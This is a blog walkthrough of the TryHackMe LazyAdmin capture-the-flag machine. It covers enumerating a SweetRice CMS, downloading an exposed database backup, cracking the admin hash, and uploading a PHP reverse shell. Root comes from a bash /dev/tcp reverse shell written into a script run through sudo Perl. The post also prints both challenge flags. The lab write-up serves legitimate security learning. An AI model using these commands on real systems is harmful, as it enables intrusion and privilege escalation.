Challenges: LazyAdmin (TryHackMe)

JebitokJebitok
4 min read

Table of contents

In this walkthrough, we exploit a vulnerable machine titled Lazy Admin on TryHackMe. The target is running a SweetRice CMS instance with known vulnerabilities. Our objectives are to gain user-level access and ultimately escalate privileges to retrieve both the user and root flags. The machine demonstrates real-world web exploitation techniques such as information disclosure through backup files, weak credential practices, and misconfigured sudo permissions. Through directory enumeration, credential discovery, reverse shell deployment, and privilege escalation, we gradually uncover the machine's weaknesses and learn practical pentesting skills.

Lazy Admin

Have some fun! There might be multiple ways to get user access.

Note: It might take 2-3 minutes for the machine to boot

What is the user flag? THM{63e5bce9271952aad1113b6f1ac28a07}

Checking the site, this is a note /var/www/html/index.html

gobuster dir -u http://<IP_Address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

curl http://<IP_Address>/content/as/index.php/

SweetRice is a CMS, and we’ll check the CVEs linked to it on Exploit Database

We’ll use this CVE: SweetRice 1.5.1 - Backup Disclosure - PHP Webapp exploit

[

When we checked the curl http://<IP_Address>/content/as/ind](https://www.exploit-db.com/exploits/40718)ex.php There’s this part where the URL on the a tag has this <a href=”./?type=password”></a>

curl http://<IP_Address>/content/as/?type=password

We’ll try these web-exposed paths to find the leak

bash
CopyEdit
# These may expose DB backups, configs, or admin credentials
curl http://10.10.111.37/content/backup/
curl http://10.10.111.37/content/data/
curl http://10.10.111.37/content/inc/
curl http://10.10.111.37/content/attachment/
curl http://10.10.111.37/content/as/data/

# Look for:

# `.sql` files
# `.xml` or `.json` configs
# `users.xml`, `config.xml`, etc.

Gobuster had revealed /inc

curl http://<IP_Address>/content/inc/

curl http://<IP_Address>/content/inc/mysql_backup/

curl http://<IP_Address>/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql -o backup.sql

cat backup.sql

You can access the backup.sql file on gists here: backup.sql file on gists. This is our area of interest that reveals the credentials of the site (username and the password hash). 

14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

Using the rainbow table, CrackStation, we’ll reveal our password

Visit the site http://<IP_Address>/content/as/ and login using credentials: manager | Password123

Copy the /usr/share/webshells/php/php-reverse-shell.php file into a new file, e.g, shell.php, then edit using nano shell.php, change the <IP_Address> to the attackbox one and the port to 4444. I tried uploading the PHP or PHP5 file to the create, but it didn’t escalate on the listening port.

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php5

$ nc -lvnp 4444 // on a different tab

Learned that there’s a media center that allows adding attachments/files, and it supports .phtml file, so I changed the file name to shell.phtml and uploaded it here. The listening port now allowed us to access the user itguy, and hence the user flag

click on the shell.phtml file you’ve uploaded and move back to the terminal to check on the port 5555

find / -type f -name user.txt 2> /dev/null

cat /home/itguy/user.txt

What is the root flag? THM{6637f41d0177b6f37cb20d775124699f}

echo '#!/bin/bash' > /etc/copy.sh

echo 'bash -c '\''exec bash -i &>/dev/tcp/10.10.23.119/5555 <&1'\''' >> /etc/copy.sh

On the other tab, have nc -lvnp 5555 listening before you run the next command:

sudo /usr/bin/perl /home/itguy/backup.pl

checking the other tab privileges would have been escalated to root

whoami

find / -type f -name root.txt 2> /dev/null

cat /root/root.txt

The Lazy Admin challenge showcases a classic example of poor security hygiene — from exposed backup files to weak credentials and dangerous sudo configurations. By leveraging a known CVE in SweetRice, performing methodical enumeration, and exploiting a poorly secured Perl script, we successfully gained initial access and escalated to root. This machine reinforces the importance of securing sensitive paths, using strong passwords, and limiting sudo access. Overall, it provides a great opportunity to practice web application exploitation and privilege escalation in a structured CTF environment.

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

tryhackmeCTF WriteupCVEPrivilege Escalationreverse-shell

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.